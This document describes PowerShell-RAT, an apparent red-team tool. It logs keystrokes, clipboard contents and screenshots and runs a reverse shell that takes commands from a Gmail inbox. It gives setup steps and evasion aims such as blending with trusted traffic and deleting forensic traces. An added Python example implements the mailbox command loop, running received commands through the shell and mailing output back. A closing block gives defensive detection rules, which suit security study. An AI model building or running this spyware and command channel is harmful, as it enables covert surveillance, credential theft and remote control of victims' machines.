PowerShell-RAT is a stealthy tool that exfiltrates sensitive information from a fully patched Windows environment via screenshots, keystroke logging, clipboard capture and a reverse shell, all carried over Gmail. It is intended for engagements where off-the-shelf RAT tooling is picked up by the client's anti-virus software and the tester still needs a proof of concept showing that an attacker can exfiltrate information from the network even though the hosts run fully patched, up-to-date anti-virus solutions.
The exfiltrated information is sent to the attacker's Gmail mailbox over an encrypted (TLS) connection in the form of email attachments. All modules can be launched with a single key press using the 'Hail Mary' option. Gmail is used to receive files from the backdoored machine because it is a widely trusted domain: the traffic blends in with legitimate mail activity and is unlikely to be blocked or flagged by next-generation firewalls.
During a Red Team engagement or an internal penetration test, this tool can be executed on any Windows machine. It backdoors the compromised user's machine with a number of scheduled tasks, which in turn run the PowerShell modules (scripts). Once backdoored, the attacker receives screenshots, clipboard history and keystrokes of the user's activity by email every few minutes. After each email is sent, the screenshots and log files are deleted from the machine to free disk space and reduce the forensic footprint, lowering the chance of detection.
When the compromised user logs on to the Windows machine, the backdoor starts the keystroke module. It records every key press to the file "log.txt" on the user machine and emails it to the attacker every hour as an attachment. Similarly, the clipboard is polled every 2 seconds and saved to "clip.txt", and that file is emailed every 5 hours.
To set up the RAT you need a dedicated throw-away Gmail account. Its credentials go into the credential variables of the PowerShell scripts, and "Allow less secure apps" must be enabled under the account's security settings so the scripts can authenticate with a plain username and password and deliver screenshots, clipboard contents and key logs from the backdoored machine. Note that these credentials sit in cleartext on the compromised host, so anyone who recovers the scripts, including the client's incident responders, can log in to that mailbox and read everything it holds; use an account created solely for the engagement and retire it afterwards. Running the modules does not require administrator rights, and the exfiltration options can be customised to suit the engagement.
The Reverse Shell module lets the attacker execute Windows commands on the compromised host by sending them to the throw-away Gmail account. The host monitors the inbox in the background for new mail: the body of each new email is read every 5 seconds and executed immediately. Once a command has run, the backdoored host emails the output back to the attacker's Gmail address automatically, giving two-way communication between the attacker and the compromised host.
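The exchange described above, as an added example that is not the project's own code: an in-memory mailbox stands in for the throw-away Gmail account so the round trip runs offline, and the command executor is injected so it can be swapped for a harmless stub. The class names, the `CMD` subject prefix used to tell operator commands apart from implant replies, and the unread-message cursor that stops a command from being executed twice are assumptions of this example, not documented behaviour of PowerShell-RAT.

```python
"""Model of a reverse shell that is driven through a shared mailbox.

Added example, not code from the PowerShell-RAT project.  The Gmail
IMAP/SMTP round trip is replaced by an in-memory Mailbox so the exchange
can be run offline; the executor is injected so a test can run a harmless
command.  Class names, the "CMD" subject prefix and the cursor logic are
assumptions of this example.
"""
import socket
import subprocess
import time
from dataclasses import dataclass, field


@dataclass
class Message:
    subject: str
    body: str


@dataclass
class Mailbox:
    """Stand-in for the throw-away account: one inbox that both sides read."""
    inbox: list = field(default_factory=list)

    def send(self, subject, body):
        self.inbox.append(Message(subject, body))

    def messages_since(self, index):
        """(index, message) pairs for everything at or after `index`."""
        return list(enumerate(self.inbox))[index:]


def run_command(cmd):
    """Default executor: run cmd through the host shell, return its output."""
    proc = subprocess.run(cmd, shell=True, capture_output=True,
                          text=True, timeout=30)
    return proc.stdout + proc.stderr


class Implant:
    """Compromised-host side: poll the inbox, run new commands, mail output."""

    def __init__(self, mailbox, hostname=None, executor=run_command):
        self.mailbox = mailbox
        self.hostname = hostname or socket.gethostname()
        self.executor = executor
        self.cursor = 0   # next unread message, so nothing is executed twice

    def poll_once(self):
        """One polling pass. Returns how many commands were executed."""
        ran = 0
        for idx, msg in self.mailbox.messages_since(self.cursor):
            self.cursor = idx + 1
            if not msg.subject.startswith("CMD"):
                continue          # our own replies or unrelated mail
            output = self.executor(msg.body.strip())
            # Reply subject carries host name and timestamp so the operator
            # can tell compromised hosts apart in a shared mailbox.
            stamp = time.strftime("%Y-%m-%d %H:%M:%S")
            self.mailbox.send(f"{self.hostname} {stamp}", output)
            ran += 1
        return ran

    def run(self, interval=5, passes=None):
        """Poll every `interval` seconds; `passes` bounds the loop for demos."""
        done = 0
        while passes is None or done < passes:
            self.poll_once()
            done += 1
            time.sleep(interval)


class Operator:
    """Attacker side: drop commands into the inbox and collect replies."""

    def __init__(self, mailbox):
        self.mailbox = mailbox
        self.cursor = 0

    def send_command(self, cmd):
        self.mailbox.send("CMD", cmd)

    def collect_output(self):
        new = [m for _, m in self.mailbox.messages_since(self.cursor)
               if not m.subject.startswith("CMD")]
        self.cursor = len(self.mailbox.inbox)
        return new


if __name__ == "__main__":
    box = Mailbox()
    op, imp = Operator(box), Implant(box)
    op.send_command("hostname")
    imp.poll_once()
    for reply in op.collect_output():
        print(reply.subject, "->", reply.body.strip())
```

Because both sides share one inbox, the only thing separating commands from replies is the subject prefix; with a real account the same separation is what lets a defender who recovers the credentials read the whole command history.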
The target system is identified by the email subject line, which is the compromised host's computer name followed by a timestamp. The Remote Access Trojan (RAT) Python file can be converted into a standalone executable with PyInstaller. During the demo at BlackHat, I walked everyone through a number of defensive mechanisms for detecting the PowerShell-RAT backdoor using publicly available tools such as Sysinternals from Microsoft. However, all of these defensive mechanisms can be bypassed by a determined attacker.
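Detection logic for the behaviour this page describes (scheduled tasks launching hidden PowerShell, PowerShell talking to Gmail mail ports, and the periodic cadence of those connections), as an added example; it is not part of the project or of the BlackHat demo material. The field names follow Sysmon's ProcessCreate (ID 1) and NetworkConnect (ID 3) events and the Windows Security log's scheduled-task-created event (4698), but the sample events, host names, task names and paths are constructed for this example, and the rule names are this example's own.

```python
"""Hunt rules for a PowerShell-over-Gmail backdoor, run over constructed
Sysmon / Security-log style events.

Added example, not project code.  Event field names mirror Sysmon ID 1/3
and Security event 4698; every sample event below is constructed.
"""
from collections import defaultdict
from datetime import datetime

MAIL_PORTS = {25, 465, 587, 993, 995}            # SMTP submission, IMAP, POP
MAIL_HOSTS = ("smtp.gmail.com", "imap.gmail.com")
HIDDEN_PS_FLAGS = ("-windowstyle hidden", "-w hidden",
                   "-executionpolicy bypass", "-ep bypass")
TASK_HOSTS = ("taskeng.exe", "svchost.exe")       # parents of task-launched PS


def basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def is_powershell(image):
    return basename(image) in ("powershell.exe", "pwsh.exe")


def analyse(events, max_jitter=2):
    """Return (rule, host, detail) findings for the given event dicts."""
    findings = []
    mail_conns = defaultdict(list)        # (host, dest) -> connection times
    for ev in events:
        eid, host = ev["EventID"], ev["Computer"]
        if eid == 1 and is_powershell(ev["Image"]):
            cmd = ev["CommandLine"].lower()
            if (any(flag in cmd for flag in HIDDEN_PS_FLAGS)
                    and basename(ev["ParentImage"]) in TASK_HOSTS):
                findings.append(("hidden-powershell-from-task", host,
                                 ev["CommandLine"]))
        elif eid == 3 and is_powershell(ev["Image"]):
            dest = ev["DestinationHostname"].lower()
            if ev["DestinationPort"] in MAIL_PORTS or dest.endswith(MAIL_HOSTS):
                findings.append(("powershell-mail-connection", host,
                                 f"{dest}:{ev['DestinationPort']}"))
                mail_conns[(host, dest)].append(
                    datetime.strptime(ev["UtcTime"], "%Y-%m-%d %H:%M:%S"))
        elif eid == 4698 and "powershell" in ev["TaskContent"].lower():
            findings.append(("scheduled-task-runs-powershell", host,
                             ev["TaskName"]))
    # Screenshots and logs go out on a fixed schedule, so the gaps between
    # mail connections from one host are nearly identical: flag that cadence.
    for (host, dest), times in mail_conns.items():
        if len(times) < 3:
            continue
        times.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        if max(gaps) - min(gaps) <= max_jitter:
            findings.append(("periodic-mail-beacon", host,
                             f"{dest} every ~{int(gaps[0])}s"))
    return findings


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [                                  # constructed telemetry
    {"EventID": 4698, "Computer": "WS01", "TaskName": "\\Microsoft\\Backup",
     "TaskContent": "<Exec><Command>powershell.exe</Command><Arguments>"
                    "-WindowStyle Hidden -File C:\\Users\\bob\\AppData\\"
                    "Roaming\\Screen.ps1</Arguments></Exec>"},
    {"EventID": 1, "Computer": "WS01", "Image": PS,
     "ParentImage": "C:\\Windows\\System32\\svchost.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy "
                    "Bypass -File C:\\Users\\bob\\AppData\\Roaming\\Screen.ps1"},
    {"EventID": 1, "Computer": "WS01", "Image": PS,            # benign
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "powershell.exe"},
    {"EventID": 3, "Computer": "WS02", "Image": "C:\\chrome.exe",  # benign
     "DestinationHostname": "mail.google.com", "DestinationPort": 443,
     "UtcTime": "2019-08-07 10:00:00"},
] + [
    {"EventID": 3, "Computer": "WS01", "Image": PS,
     "DestinationHostname": "smtp.gmail.com", "DestinationPort": 587,
     "UtcTime": t}
    for t in ("2019-08-07 10:00:00", "2019-08-07 10:05:00",
              "2019-08-07 10:10:00")
]

if __name__ == "__main__":
    for rule, host, detail in analyse(SAMPLE_EVENTS):
        print(f"{rule:32} {host:6} {detail}")
```

Each rule on its own is noisy in an environment with legitimate PowerShell mail scripts; the cadence rule is the one that survives an attacker renaming the task or the script, because the exfiltration schedule is what gives the tool its value.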
Further details and the source code are available on GitHub: https://github.com/Viralmaniar/Powershell-RAT